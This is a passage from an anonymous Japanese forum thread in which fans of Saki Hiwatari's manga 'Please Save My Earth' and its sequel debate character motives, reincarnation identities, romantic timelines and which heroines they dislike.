162 :花と名無しさん:2006/08/31(木) 16:10:57 ID:???0
>>160
推測だけど玉がココと別れて木蓮に出会う間の期間じゃないかな??

163 :花と名無しさん:2006/08/31(木) 16:13:29 ID:???0
木蓮と紫苑が婚約発表してからじゃなかったっけ?

164 :花と名無しさん:2006/08/31(木) 17:10:27 ID:???O
今日ふと本屋で目が止まりました
続編でてたんだー
凄まじい劣化だが

取りあえずシオンよ
お前ミクロのこと殴れるような御大層な立場なのか…
あれだけ迷惑かけといて

165 :花と名無しさん:2006/08/31(木) 18:09:12 ID:???0
ぼく月に紫苑も木蓮も出さないでほしい

166 :花と名無しさん:2006/08/31(木) 19:18:11 ID:???0
どうしても分からない所があるので質問。

輪はどうして亜梨子と婚約したの?
晴彦から「歯止めだったんだ」とか言われてたけど、
具体的に何の為?

167 :花と名無しさん:2006/08/31(木) 19:34:01 ID:???0
迅八からアリスを守るためじゃない?

168 :花と名無しさん:2006/08/31(木) 19:35:17 ID:???0

アリスが、ジンパチや他の男とくっつかないようにするため。

輪が相手だと、世間が相手にしない、もしくは不自然に思われる。
(年齢の問題や、明らかに例の事件の償いで婚約してるのがバレバレなため)
晴彦なら不自然じゃないし、輪の手前、晴彦はアリスに本気で手は出せない。
だからアリスが他の男になびかないように晴彦を歯止めに利用。
それに、キーワードを思い出させる(覚醒させる)には、
紫苑の外見ソックリの晴彦のほうが手っ取り早いから。

どっちに転んでも、アリスに嫌われるのは最終的に晴彦ってことになる。
・実はシウだったとばれても、アリスを騙したことになる→嫌われる
・紫苑のまま通したとしても、輪は「木蓮は紫苑をうらんでる」と思い込んでるから、
 紫苑である晴彦は覚醒したアリスに嫌われる

輪の思考回路では、こうなっていると思われ。




169 :花と名無しさん:2006/08/31(木) 19:38:21 ID:???0
輪と紫苑が好きじゃなかった
この二人が好きだったらもっとこの世界にのめり込んでたかも
そう考えると良かったか

170 :花と名無しさん:2006/08/31(木) 19:42:09 ID:???0
>>163
そうなの?

171 :花と名無しさん:2006/08/31(木) 20:08:58 ID:???0
>>167>>168

ありがとう。そうなんだー

春彦には、亜梨子を誘惑してキーワードを聞き出せとか言ってたから、
亜梨子が誰とくっつこうがキーワード最優先なのかと思ってた。


172 :花と名無しさん:2006/08/31(木) 20:12:29 ID:???0
>>160
この質問と回答もループだね。テンプレ追加する?

過去ログ読まずに自分なりの解釈。
・ベッドイン話が最初に出た時点では迅八と一成は月基地の話しかしておらず、
 学生時代からの知り合いだと判明した(後付け?)のはかなり後。
 よって月基地に行ってからの可能性が高い。
・一成の「誘ったのは僕(エンジュ)の方だし、彼も(将来の)約束なんかしなかったけど」
 という語りからして、恐らく一度きり。
・一成だけが見てた夢の中で、「地球に降りてあなたの子供を産みたい(育てたい?)」などと
 プロポーズまがいの事を言いながらエンジュが玉を抱きしめてる辺り、
 その直後に二人がそういう関係になった可能性が高い。
 会話の内容からして、恐らく母星消滅後。

173 :花と名無しさん:2006/08/31(木) 20:19:04 ID:???0
>>167-168
同じくサンクス。
私も>>171さんのようにキーワードが優先なのかと思ってた。

春の歯止めがどうこうの後の「君(輪)はまだ玉蘭を〜」のセリフも分からなかったのだけど、
「まだ木蓮(ありす)が玉蘭(迅八)を好きだと思ってるのか?」
もしくは「まだ玉蘭(迅八)を脅威のライバルだと思ってるのか?」
って意味だったんだね。

でもあそこで春が「木蓮が愛してたのは紫苑」と言った所で、
輪は聞く耳持たなかったろうな。

174 :花と名無しさん:2006/08/31(木) 23:03:03 ID:???O
>>172
でもベッドイン夢を共有したあとに横浜の大介と会ったけど
その時は母星消滅を全く知らなかったよね?迅八と一成

175 :花と名無しさん:2006/09/01(金) 00:11:38 ID:???0
夢は断片的にみてるから、いつかはわかんないんじゃない?

176 :花と名無しさん:2006/09/01(金) 00:33:07 ID:???O
もしかしたら、月基地メンバーで年表?作ってたときに、予想できてたかもね。

177 :花と名無しさん:2006/09/01(金) 00:55:03 ID:???0
>>114
あれは紫苑の内省だから
誰かに向けたテレパスでもなんでもない

>>174
その夜の記憶だけを見たなら、当時の一成たちには母星消滅までは
わからなかったんでは

178 :花と名無しさん:2006/09/01(金) 01:35:12 ID:???O
玉と槐は月基地前に関係を持ったと個人的に解釈してた
月基地メンバーの挨拶のとき泣いてた貴方を慰めてさしあげたのは誰?
っていう槐のセリフからそのときだったのかな?と
月基地では玉が木蓮にぞっこんだったからまさか月基地で関係を持ったとは思えずと解釈しました

179 :花と名無しさん:2006/09/01(金) 01:55:50 ID:???0
ベットインの夢を見る
    ↓
大介宅で母星消滅の話しを聞き
迅八が泣き一成がなぐさめる
    ↓
その直後、同調連鎖(?)で転寝しながら
似たような状況の月の夢(玉蘭が母星消滅で泣き、エンジュがなぐさめる)
を見る

    ↓
 キスシーンになる
    ↓
  ベットイン(多分)

キスシーンでは絵が迅八と一成になってたけど、実際は玉とエンジュの本当にあった
過去で、月基地での玉とエンジュのキスシーンは唯一ここだけ。
なのでこの後の可能性がとっても高いと思う。
それにキスシーンの後に2人が目が覚めたのは、その後の続きを以前見てしっていたから
とも考えられませんか?
そしてその直後の銭湯。
銭湯といえば裸の付き合い
そしてやけに自分の裸への迅八の視線を意識している一成。

な〜んて、考え過ぎだね

180 :花と名無しさん:2006/09/01(金) 02:56:56 ID:???O
木蓮、苺…。女に嫌われる女を描かせたら日渡は日本一ですな。

181 :花と名無しさん:2006/09/01(金) 03:25:45 ID:???0
>>178
まんま「ああよしよし」と母親のように慰めたんだと思ってた。
体関係で慰めたんならそういうセリフはエンジュからは出にくいと思う。

男に生まれ変われば友達としてでもずっと側にいられる、って思ったのって
エンジュ自身も玉に本心から振り向いてもらえる可能性は少ない、って
どっかで思ってたんじゃないかな。

182 :花と名無しさん:2006/09/01(金) 07:04:39 ID:???0
>>178
私も>>181さん同様、あの時は本当にただ慰めてあげただけだと。
仮に玉とエンジュのベッドインが母星消滅後だとして、
紫苑・木蓮のレイープ事件の前か後かまでは分からないけど、
後なら木蓮を失った悲しみでエンジュに…って可能性もあるよね。

183 :花と名無しさん:2006/09/01(金) 07:05:52 ID:???0
>>180
この二人だったらやはり苺の方が嫌いかな。

木蓮は一応過去から嫌々ながらもキチェスの勤めを果たしてたり、
才女って事はそれなりに勉強も努力してやってたのだろうけど、
苺は可愛いってだけで他に取り得がないし、
健と付き合うまでは自分の境遇に甘えて努力のどの字もしてそうにないし。

あと、苺には木蓮のように辛い過去がないって妬みもあるかも。
昔から多少のイジメはあったかもしれないけど、
彼女の場合はどう考えても本人の性格に問題があるし、
それ以上に清華・夜子といういい親友に恵まれてるし。
声絡みで男子にイジメられたってのは、好意の裏返しだと思うし。

184 :花と名無しさん:2006/09/01(金) 09:31:02 ID:???O
苺は「なんだコイツ」という感じだった。
木蓮は、はねっ返り設定は正直いらんかったけど、
嫌いにはなれなかったなぁ。


185 :花と名無しさん:2006/09/01(金) 10:22:02 ID:???0
初期の木蓮は好き
中期以降の木蓮は嫌い
でした(後つけしたみたいな性格が出てきてから

186 :花と名無しさん:2006/09/01(金) 10:35:22 ID:???0
そもそも紫苑と玉蘭って親友なの?
深いところでは意識し合ってたんだろうけど、お互いを理解し
合ってるような関係じゃないよね?
国の命令で仕方なく行く紫苑と、紫苑が望んでも望んでも手に入らないもの
を全て自ら捨てて、志願して行く玉蘭

たとえ木蓮がメンバーに入ってなくても仲良くはやってないでしょー。



187 :花と名無しさん:2006/09/01(金) 10:44:46 ID:???0
>>186
紫苑がいじめられて玉が代わりに泣いてたのも偽善の演技でなく本心だろうし、
玉の棺の前で紫苑が一人で泣いてたのももちろん本心だろうから、
元々お互いに好きではあったんじゃない?

ただ、紫苑が素直じゃないからいつも玉蘭の好意を突っぱねて、
玉も紫苑の本心までは気づかないから「何だよ」と思いながらもやっぱりほっとけない、
そして紫苑は余計イライラ、でも本音は構って欲しいからちょっかいを出し、
玉はそんな紫苑がますます訳分からない…みたいな悪循環だったのではないかと。

紫苑が素直にさえなれば、すごくいい親友になれたのだと思う。

188 :花と名無しさん:2006/09/01(金) 10:50:25 ID:???0
健と苺が結婚後に住んでた家って一軒家っぽいけど、
実家に健父と同居してるのか今後も同居しないつもりで新居を建ててしまったのか。
後者なら健父カワイソス。結婚前は氷樹の代わりに苺が家事をやりに来てくれてたのに。

南北の争いで、直接関係ない(おそらく健も氷樹も別の父親からでも生まれたはず)のに
一番割りを食ったのって健父だよね。
妻は操られて殺されてしまうし、二人の子供は早すぎる出来婚で自分の元から離れて行くし。
まあ後者はその分孫の顔も早く見れたし、めでたい事でもあるけど。

189 :花と名無しさん:2006/09/01(金) 13:49:10 ID:???O
ふと気づいた。
腐女子的にはシオンとギョクがいいカップルになりそう。

190 :花と名無しさん:2006/09/01(金) 14:38:02 ID:???0
>>189
要するにシュスランは腐女子だとw
でも確かに桜もその傾向あったものね。
田村が春に人工呼吸したシーンをうっとりして嬉しそうに語ってたし。
その人工呼吸がマウス〜なのかそうでない方のか気になるけど。

191 :花と名無しさん:2006/09/01(金) 14:55:22 ID:???0
アリスも輪が意識不明の重態なのに、一成と迅八のホモシーンを
妄想してうっとりしてた腐女子だし、木蓮も紫苑は玉蘭を愛してると
言っていた腐女子ということでおk

192 :花と名無しさん:2006/09/01(金) 15:04:18 ID:???0
要するに日渡さんが腐女(ry

193 :花と名無しさん:2006/09/01(金) 15:10:43 ID:???0
健が苺と早く結婚してらびを作ったのは全の為だろうけど(苺には何のメリットもなさそうだが)、
こうき(字忘れた)と夜子がそうしたのは早く子供と再会して救ってやりたいと言う他に、
お互いの家庭の事情もあったのだろうか?

こうきは早く独立して母親の負担を少しでも軽くしてやりたい、
そして夜子は義兄と妹が結婚しておそらくそのまま住むであろう離れに
いつまでも自分がいては邪魔だと思って、とか。

勝手な解釈だけど、そう考えると同じ10代の出来婚でも
やっぱりこっちのカポーを応援したくなるよなあ。

194 :花と名無しさん:2006/09/01(金) 15:16:11 ID:???0
>>189
あー それはわかる 萌えないけど。
木蓮が玉といるとほっとすると言ったように 
木蓮と玉はどこか似てたんだと思う。
木蓮はアダルトチルドレンな闇も抱えてる(そこは紫苑と似てる)けど
愛されっこ故の幸せな傲慢さというかほのぼの感もあって
そこが玉に似ててだから惹かれたって部分もあったと思うし。
あと 木蓮とKK女性陣が仲良くなれなかったのはまあ嫉妬もあるだろうけど
女3人の中で親友2人が固まっちゃうとよっぽど友人スキルが高くない限り
そこに割り込むなんて出来ないからじゃないかと思うけど。
あんまり周囲にマンセーされるキャラは好きじゃないけど
木蓮は可愛いと思ったよ。
闇は抱えても闇に支配されない根の善人さとか。

195 :花と名無しさん:2006/09/01(金) 15:26:29 ID:???0
>女3人の中で親友2人が固まっちゃうとよっぽど友人スキルが高くない限り
>そこに割り込むなんて出来ないからじゃないかと思うけど。

それはあるよね。木蓮もあの二人の第一印象は悪くなかったみたいだし(特にエンジュ)、
最初は仲良くしようと思ってたみたいだし。
ただ、「親友はモードがいるから二番目以降の友人しか作らない」って発言はどうかと。
もちろんモード以外の人の前では言ってないけど、人なんてどんなきっかけで
本当の親友になるかなんて分からないのだから、最初からそんな気持ちで接してたら、
微妙に相手に伝わってどうしても距離が出来ると思うのだけど。

196 :花と名無しさん:2006/09/01(金) 15:36:07 ID:???0
あと、男だからあまり目立たなかったけど自分以外の男三人が
学生時代の友人だったという柊も仲間に入りづらそうで可哀相だったな。
というか、7人中5人が何らかの関係で知り合いなのに、
採用しちゃって良かったのだろうか?
パスワードの問題とか色々な設備とかグルになって悪用される恐れもあるのに。

それだけ志願者のいない人気のない職業だったのだろうけど、
その理由もよく分からないな。
リスクは母星にしばらく帰って来れないってだけで、仕事自体は暇で楽そうだし、
食事と娯楽も地球から調達して何とかなりそうだし。
地球の宇宙飛行士同様、身体への負担やリスクが大きかったのだろうか?

197 :花と名無しさん:2006/09/01(金) 15:44:55 ID:6XwEkb+D0
迅八の
「どうしたんだらう」が

気になる

198 :花と名無しさん:2006/09/01(金) 16:06:38 ID:???O
春彦の
ノシャプケミング
が気になる

199 :花と名無しさん:2006/09/01(金) 16:21:58 ID:???0
晴彦のマザコンぶりが目に余る

200 :花と名無しさん:2006/09/01(金) 16:24:52 ID:???0
>>181
もし体で慰めたとしたら、エンジュでなくとも普通人前で言えないしね

201 :花と名無しさん:2006/09/01(金) 16:32:47 ID:???0
>>196
閉鎖的な僻地で少人数の職場なんて考えただけで息がつまりそう…
嫌いな人間がいても逃げられないし、
現代の地球で言えばクラブやスノボに行きたいと思ってもないし
海も川も山もないしレストラン(ただ美味しいものを食べるんじゃなくて
店の雰囲気を満喫する楽しみがある)もないし

202 :花と名無しさん:2006/09/01(金) 16:34:12 ID:???0
あ、普通の職場でも逃げられないけど、少人数だと余計にってことね

203 :花と名無しさん:2006/09/01(金) 16:41:59 ID:???0
>>193
健の家を二世帯住居に改築して住んでいるんじゃないの?
「新築より改築の方が費用が安いし、同居だったらすぐに義父に娘の子守を頼めるもん。」
と苺なら考えそうだよ。

夜子と野田が互いの家族に気を遣ったのもあって早婚に踏み切ったというのは、ありそうだな。
特に夜子は「結婚だったら家族のみんなも余計な心配しないし、一番角が立たないだろう」と
常に周囲に気を遣うタイプの夜子ならそう思うよ。


麒麟が学校に行っていたとしたら、(恐らくは家が近くだから校区は同じだと思うけど)
らびと一太郎と同じ学校かな。
夏寿輝なら、2人が同じ学校だったら健と氷樹は異母姉弟(=氷樹は健父が妻以外の女性に
産ませた私生児)という事が分かって氷樹と麒麟がいじめられる事を危惧して、麒麟を私立校か
授業内容も学校からもらう書類も英語だから氷樹も楽だろう、とインターナショナルスクールに
通わせている事も考えられるよ。

北凰院家の三女と四女は力が安定していないから学校に行っていないと言っていたからね。

204 :花と名無しさん:2006/09/01(金) 17:06:37 ID:???0
ようつべで僕地球のアニメを見たけど、今更ながら後半部分を
完全に作ってほしいなー・・・なんてキボン(´・ω・`)

205 :花と名無しさん:2006/09/01(金) 17:31:06 ID:???0
なんだこのスレ・・・
単行本しか買わなくなったから次世代編の情報欲しくて来てみたら
キンモーーッ☆

206 :花と名無しさん:2006/09/01(金) 17:59:24 ID:???0
ラズロの生まれ変わりがブンさんで、
キャーの生まれ変わりが森先生だって書き込みを
どこかで見たんだけど、これってマジ?
確かにラズロとブンさんは似てると思ったが、キャーが
森先生だったなんて・・・・

207 :花と名無しさん:2006/09/01(金) 19:02:20 ID:???0
部外者同士、木蓮が柊とくっつけば良かったのになぁw
柊が相手だったら意外過ぎて秋も紫苑も玉も、あそこまで
相手に激しい嫉妬心を起こさないだろうし、女衆も柊相手なら
木蓮に対して嫌な気持ちを持たなかったような気がする。

208 :花と名無しさん:2006/09/01(金) 19:02:31 ID:???0
長文多すぎて読む気しない

209 :花と名無しさん:2006/09/01(金) 19:48:47 ID:???0
>>177
いや、はっきりと泣きながら口に出してるよ。
正確には
「口実が必要だったんだ
 あんたを抱くのに オレは 単に」

>>206
違う、反対だよ。
ブンさん=キャー
森先生=ラズロ
ブンさん=キャーは作者がどっかでそう発言してたんじゃなかったっけ?
森先生=ラズロは憶測で確定はしてなかった気がする。



210 :花と名無しさん:2006/09/01(金) 19:59:53 ID:???0
>>209
あの場面であのセリフだと、単に家族のふりをしてくれる人が
欲しかったから(寂しかったから)「神を踏みにじるため」と
自分に言いわけした…と鈍い木蓮にはとれるだろうな
「好きだから」ってはっきり言えばよかったんだろうけど

211 :花と名無しさん:2006/09/01(金) 20:28:45 ID:???0
えっ、ブンさん=キャーで森先生=ラズロなの?
外見的にはどう見てもブンさんはラズロっぽいので意外だ。

ブンさん…見た目はラズロ。輪の幸せを盲目的に願う辺りはラズロ、キャーどちらにも当て嵌まる。
     知能的にはキャー
森先生…見た目はどちらにも似ていない。輪に対して少々の疑りもあるため、
    ブンさんほど盲目的ではない。頭の良さはラズロっぽい。

という感じだな。

212 :花と名無しさん:2006/09/01(金) 20:49:55 ID:???0
>>207
木蓮って秋に対しては同じ地球好きだと知ってか、
外見にこだわらず親しみ持って仲良くしてたらしいけど、
柊とは最後までそういう雰囲気はなかったね。
木蓮に外見でも性格でも全く興味持ってもらえなかった柊カワイソス。

柊もいくら美人でもそんな木蓮にどうして惚れてたんだか。
同じ理由で大介→ありすも全く分からない。
最初は桜と一緒になって本当に木蓮かどうか疑ってた(ありす自身には興味なし?)位なのに。

213 :花と名無しさん:2006/09/01(金) 20:57:06 ID:???0
木蓮に惚れるのは分かる。
でもいくら前世が木蓮だったとはいえ、特に接点が無かったアリスに
大介が惚れるのって釈然としないな。それを言うと晴彦がアリスに
惚れているのも妙な感じ。
迅八、輪はアリスと接点があったからまだ分かるけど、アリスって
見た目はキレイとは言え木蓮ほどの絶世の美女でもないし、普通の
女の子という設定だったはずだしなぁ

214 :花と名無しさん:2006/09/01(金) 22:37:25 ID:???0
一応大介や春彦のことは(迅八も)
輪の邪推の域を出てないから・・・

215 :花と名無しさん:2006/09/01(金) 22:52:41 ID:???0
彼女の歌声は実は植物だけじゃなく動物にも効く。

216 :花と名無しさん:2006/09/01(金) 22:59:16 ID:???0
作中で前世と今は関係ないそうじゃないと生まれ変わった意味がないとか
キャラに言わせてたけど結局大人になった今でも前世引きずりまくりだね
キャラも日渡さんも

217 :花と名無しさん:2006/09/01(金) 23:15:19 ID:???0
>>215
木蓮が、キチェスの歌声は他の星にも届くかもしれないから、
月基地で黒聖歌歌って地球に影響出たら大変とか言ってたよね。
もしかしたらキャーが大きい原因って…。

218 :花と名無しさん:2006/09/01(金) 23:21:07 ID:???0
>>214
でもあの後他の月基地キャラがほとんど登場してないし、
日渡さんが輪に単なる推測を言わせっぱなしにして終わりってのもなあ。
かなりの輪・ありすマンセーのはずなのに、
「ありすは実際はそれほどモテてないのに、そう思い込んでる妻バカの輪」
ってつもりで描いたとも思えないし。

219 :218:2006/09/01(金) 23:38:50 ID:???0
×妻バカ
○夫バカ

220 :花と名無しさん:2006/09/02(土) 00:06:51 ID:???0
ミクシイ


221 :花と名無しさん:2006/09/02(土) 01:01:50 ID:???0
ボク月はコミクスを半分惰性で読んでるけど
キャーと輪の絡みのエピはぼく地球を読んでた時の気持ちが
甦って胸にくる。もう刷り込みとしか言いようが無い。

ボク月はどこに持っていきたいのかよく分からない。
輪の能力とEPIAと絡ませようとするあたり
日渡欲出しすぎだろ。
蓮の天然パワーですべて解決!だけは勘弁ね。

222 :花と名無しさん:2006/09/02(土) 02:29:28 ID:???O
>>216
前世の教訓や気持ちを現世に生かさねば
そうでなきゃ生まれ変わった意味がない

とも言えるよね。

223 :花と名無しさん:2006/09/02(土) 16:05:32 ID:???0
未来のうてなの詩愛が「一番前世に縛られていたのは私達だね」
と言っていたな。

日渡マンガの中でも前世の呪縛を解き放って新しい人生を生きているキャラって
うてなの一太郎ぐらいなんじゃないの?

224 :花と名無しさん:2006/09/02(土) 17:13:01 ID:???0
ビワタリさんも過去の栄光に縛られてるな

225 :花と名無しさん:2006/09/02(土) 18:12:49 ID:???0
ぼく地球の前も名作とまでは言わないけど、けっこう面白い漫画描いてたのにね。
山王戦で燃え尽きた湘北みたいなものか。

ぼく地球ですべてを出し切った日渡は、嘘のように劣化した・・・

226 :花と名無しさん:2006/09/02(土) 18:16:52 ID:???0
どうせ過去の作品にしがみつくならアクマくんでも書いててくれー

227 :花と名無しさん:2006/09/02(土) 20:26:52 ID:???0
>>226
今の絵でアクマくんはいじんないで欲しい。
でも結末は知りたいんだよなぁ…。


228 :花と名無しさん:2006/09/02(土) 21:32:10 ID:???0
アクマ君って20年以上前の作品でしょ?
今のクオリティで書かれてもがっかりするだけだと思う。

229 :花と名無しさん:2006/09/02(土) 21:57:26 ID:???0
当時の絵を再現できるって言うのなら、描いて欲しいけどね。
聞く所によると竹宮惠子は「風と木の詩」当時のタッチを再現出来るんだって。

230 :花と名無しさん:2006/09/02(土) 23:23:37 ID:???0
今日まんが喫茶いったらぼくタマの続きが出ててびっくりしてスレ探してきました。
そして、ありす(木蓮)がこんなに嫌われて(?)いることを初めて知り、びっくり!w
言われてみればちょっと鼻に付くところの有るキャラだし、すごく面白いスレ〜

231 :花と名無しさん:2006/09/02(土) 23:45:39 ID:???0
>>209
あんなかわいい化けぬこが、おっさんに・・・(涙)


232 :花と名無しさん:2006/09/03(日) 04:41:38 ID:???O
そこまであの月組を中心に転生するわけないよなとは思う
あの浮浪者唐突すぎだし
医者も医者だ、普通通報するっしょ

233 :花と名無しさん:2006/09/03(日) 06:15:49 ID:???0
もぐりだから逮捕されるよ。

234 :花と名無しさん:2006/09/03(日) 13:41:32 ID:???0
医師免許は持っていても、やっぱり無許可で診療所を経営しているとヤバイかな。

>>180
>木蓮、苺・・・。女に嫌われる女を描かせたら日渡は日本一ですな。

桜、夜子、青華、氷樹、チャチャを見ていると、そうとも言い切れないな。

苺には青華・夜子・美夜姉妹という友達がいたのに、氷樹に純奈以外に
友達が出来なかった事が不思議だったよ。

夜子と青華の場合は周りの女の子達から「あの2人と友達になりたいけど
苺と美夜が一緒だから近づきにくい」という訳で他に友達が出来なかった事も考えられるな。

235 :花と名無しさん:2006/09/03(日) 14:44:17 ID:???0
>>234
氷樹は日本に来てからは仕事はあの花屋だけみたいだし、
出会いもないから純奈以外の友達が出来ないのは別に不思議じゃなかったけど。
麒麟が幼稚園や小学校に上がって母親同士の付き合いが密になる頃には、
麒麟の事で精神を病んでしまったのだろうし。

でもイギリスにいた頃にもあまり友達らしい友達はいなさそうだったよね。
孤独で「早く日本に行きたい」雰囲気漂わせてたし。
日渡さんが>>52辺りの理由であえて描かなかっただけかもしれないけど。

236 :花と名無しさん:2006/09/03(日) 14:56:51 ID:???0
>>234
美夜は長期病欠というブランクがあって友達出来ないと嘆いてた割には、
家に泊まりに行くような新しい友達が出来てたよね。
中学時代の雅の友達も美夜と仲良くしてたし(↑と同一人物?)。

美夜はわがままで甘ったれだけど、その分素直で可愛げもあるから、
面倒見の良い人にはほっとけないって感じで男女問わず好かれるかもね。
その点苺は毒舌だし生意気で可愛げないし、
自信家だから守ってやりたいとも思えないし。
実は友達思いって設定がなければ、本当にいい所なしだよね。

237 :花と名無しさん:2006/09/03(日) 20:53:15 ID:???0
>>235
ビワタリさんの一身上の都合の他に、無理矢理だけれど氷樹は実は資産家一族の箱入り娘
学校に行く代わりに家庭教師、1人で外出する事もほとんどないという育ち方だったので
文通友達の純奈と親戚らしきボブ以外友達がいなかった、とも思っていた。
私生児という事でいじめられていたとしても、友達が1人か2人ぐらいはいてそうだし

成田空港での一件で「危機管理能力というか自己防衛意識に欠けている面があるんじゃないか」
と思ったんだよ。片親で育ったならそういう所、もっとしっかりしてそうだけどな。

238 :花と名無しさん:2006/09/03(日) 23:15:34 ID:???O
>>230
自分は嫌いじゃないよ。叩きが激しくて見てて怖かったくらい。

239 :花と名無しさん:2006/09/04(月) 11:30:15 ID:???0
同じ文章でも見る人によって、叩きとも分析ともとれる。
(まぁ中にはいかにもな叩きもあるけど)理由もなく嫌いとか
ウザイとか言うんじゃなくて、ちゃんと色々考えて書いたんだなと
思えるものは、自分の意見とは違ってても面白く読めるよ、私は。

240 :花と名無しさん:2006/09/04(月) 19:56:14 ID:???O
まぁ分析というか、キャラの好き嫌いの感想はあって当然。

ただごく少数だけど、余りに感情剥き出しでキャラ叩きしてる人はね。
リアルタイム読者なら結構いい歳のはずなのに…と生温かい気持ちになる。
最近読んだ十代の子なら仕方ないが。


241 :花と名無しさん:2006/09/05(火) 01:54:44 ID:???O
ごめん、殺伐としてて読んでて面白かったと思う
好き派も嫌い派も、言いたいこと言えばいいんじゃね?
私はありすが不当にモテていたと思う
別に好きでも嫌いでもないが、小学生や中学生と生でやるのはバカだと思ってる

私は頭がもさもさしてるからじんぱちが嫌いだわ

242 :花と名無しさん:2006/09/05(火) 01:56:33 ID:???O

            l^丶
            |  '゙''"'''゙ y-―, ずっと一緒もさ
            ミ ´ ∀ `  ,:'
           ;:'  ハ,_,ハ    ミ
           ; ⊃;´∀` ;(ヽ,  '; …ウン!
           ; " ;   ,;:' '  ミ
           `:;,, "'''''"   ,,,:'
             "゙'''~"^''゙""


243 :花と名無しさん:2006/09/05(火) 10:37:11 ID:???O
>>240
それです。
自分は二十前半ですが、上司の奥さんが読んでたって聞いてその世代のイメージでいたので、げんなりしてました。
勝手なイメージなので、気を悪くされたらごめんなさい。

244 :花と名無しさん:2006/09/05(火) 15:42:34 ID:???0
自分はリアルタイムで読んでいた派だけど
ありすも木蓮も普通に好きだった…

その自分からしたら
まあ、ちょっと書き込みにくいふいんき(ryだとは思った。

245 :花と名無しさん:2006/09/05(火) 16:30:12 ID:???0
連載当時の嫌いキャラは秋海棠ぐらいかなあ
けど転生体の春彦は七人の中では1番好きだったので複雑だったような記憶がある

246 :花と名無しさん:2006/09/05(火) 16:57:01 ID:???O
私は桜が嫌いだった。ありすに
「やーだぁやめてよォ」ケラケラケラ
「だってそんなのまだわかんないじゃない」って言ってたから。

247 :花と名無しさん:2006/09/05(火) 17:00:46 ID:???0
桜とありすは絶対仲良くならない二人だよねw

248 :花と名無しさん:2006/09/05(火) 18:56:45 ID:0ubN9BRK0
私は木蓮・ありすが大嫌いです。
周りでもこの2人は好きと言う人は皆無でした。
ここでの意見などをみると大体普通のような気がします。
やっぱり嫌っている人もいるんだなという感じです。
ファンサイトなどではあきれるほど持ち上げられすぎなので。
私は秋が好きです。
嫌いという人が多いけど、たまに好きだという書き込みがあると
嬉しいです。

249 :花と名無しさん:2006/09/05(火) 19:52:36 ID:???0
ありすと桜って転生後はたった二人の女性なのに、
お互いをどう思ってるのかははっきり語られてないんだよね。
第一印象はお互いに良かったみたいだけど、ありす=木蓮と分かった後は、
それに関しての疑惑も含めて極めて微妙な関係。

>>246のシーン後の「ン年ぶりに桜さんに笑われちゃったけど」で桜への不信感、
一成の「エンジュの頃は木蓮が大嫌いだったけど、男になった今は惹かれる気持ちも分かる」の後の、
「そ、そーゆーもん?」で「自分は今でも嫌い(ありすに関しては不明)」ってのは分かるけど。

250 :花と名無しさん:2006/09/05(火) 20:32:58 ID:???0
うーん、もしかしてここってあいつがいるかな。
もしかして木蓮に私を重ねて難癖つけてないかw
いや木蓮に重ねて見ていただくほどの美人ではないと思っておりますが。

だからあんたのことが嫌いなんだな。
例え地球上の人類が全て死滅してあんたとふたりきりになっても
あんたとは結婚しないわ。

251 :花と名無しさん:2006/09/05(火) 20:37:30 ID:???O
あっはっはっはっはっは
出たよ電波
呼んだの誰だよww

252 :花と名無しさん:2006/09/05(火) 20:57:41 ID:???O
流れを読まずレス
>>246
私もあのシーンで桜が大嫌いに
大真面目に前世は異星人とか言う奴が、動物植物の気持ちが分かるってのを嘲笑えるか!と

253 :花と名無しさん:2006/09/05(火) 21:08:28 ID:???O
>>252
物凄い説得力だ

254 :花と名無しさん:2006/09/05(火) 21:09:53 ID:???0
>>251
やっぱりいたか…
あんたのそういう正体、あんたはとぼけるだろうけど
こっちは絶対忘れませんからw

255 :251:2006/09/05(火) 21:15:28 ID:???O
>>254がマジこえええええええええええええええええええええ
私なんかした?
あいつって何?なんのネタ?
うひょぉぉぉぉぉぉ
アンタッチャブルううううううう

256 :花と名無しさん:2006/09/05(火) 21:16:19 ID:???0
あwdtgふkl「kぅkd「;

257 :花と名無しさん:2006/09/05(火) 23:42:20 ID:???0
誰だ。携帯から電波飛ばしてるのは(゚д゚)

258 :花と名無しさん:2006/09/05(火) 23:59:09 ID:???0
結局亜梨子は音大でも友達が出来なかったみたいだな。
同じ声楽じゃライバルになりがちでも、違う専攻の人達じゃダメだったのかな?

>>236
「ハチミツとクローバー」の山田あゆみの様な子となら友達になれそうだな>美夜

>>241
>小学生や中学生と生でやるのはバカだと思っている

そんなの当たり前だよ。
でも妊娠して出産しても日渡さん的には結婚しちゃえば万事OKなんだよ。

259 :花と名無しさん:2006/09/06(水) 00:28:34 ID:???0
なんかここってほんと、ただの作品やキャラ批判ていうより
キャラに自分の恨みつらみをぶつけて憂さ晴らししてるような
人がいるな…

260 :花と名無しさん:2006/09/06(水) 01:48:15 ID:???O
電波が一人いるし…

261 :花と名無しさん:2006/09/06(水) 03:16:05 ID:???0
>>259
それなのよね。
だから見苦しい。

262 :花と名無しさん:2006/09/06(水) 08:25:44 ID:???0
ありすの音大学時代の話もあるの!!
読んでみたい!
コミックスになるかな


263 :花と名無しさん:2006/09/06(水) 09:59:30 ID:???O
>>259
そうだよね〜。過去に何かあって、すごくコンプレックスでもあるのかなって感じた。
キャラのことどんな風に思おうと自由だけど、それだけじゃないだろうって書き方してるよ…

264 :花と名無しさん:2006/09/06(水) 10:13:34 ID:???0
>>241
>小学生や中学生と生でやるのはバカだと思っている

生じゃなくても自分の年齢考えたらヤバいだろうw
まあありすと輪の初体験がいつだか明言されてない以上
(「結婚しようかいますぐ」のセリフは一応どちらともとれるし)、
輪が高一になってすぐ→即妊娠の可能性もあるのだけど。

スレ違いだけど「オトナになる方法」も真吾の高校入学直後から
一気に大学生まで時間を飛ばして、その辺上手くスルーしてるよね。
花ゆめ的にはセクースは男女問わず高校生になったらオケーって感覚なのだろうか?

265 :花と名無しさん:2006/09/06(水) 10:34:17 ID:???0
>>259
禿堂
報われない悪意に満ち満ちている

266 :花と名無しさん:2006/09/06(水) 14:25:25 ID:XmfwxrQ20
ありすも木蓮も魅力のないキャラだとは思うけど、嫌うほどの決定打がない。

267 :花と名無しさん:2006/09/06(水) 15:05:41 ID:???0
>>264
真吾と久美子は、また違う意味で痛いカップルだったからね。
「挙式が決まってから妊娠が分かったから出来婚じゃない!」
と言い張っている所がね。

亜梨子と輪の方が、ある意味潔いかな?

268 :花と名無しさん:2006/09/06(水) 15:40:46 ID:???0
あれは作者がかなりアレだったから・・・

269 :花と名無しさん:2006/09/06(水) 16:26:41 ID:???0
苺の性格が普通にイイコではなく一癖も二癖もあったのは、
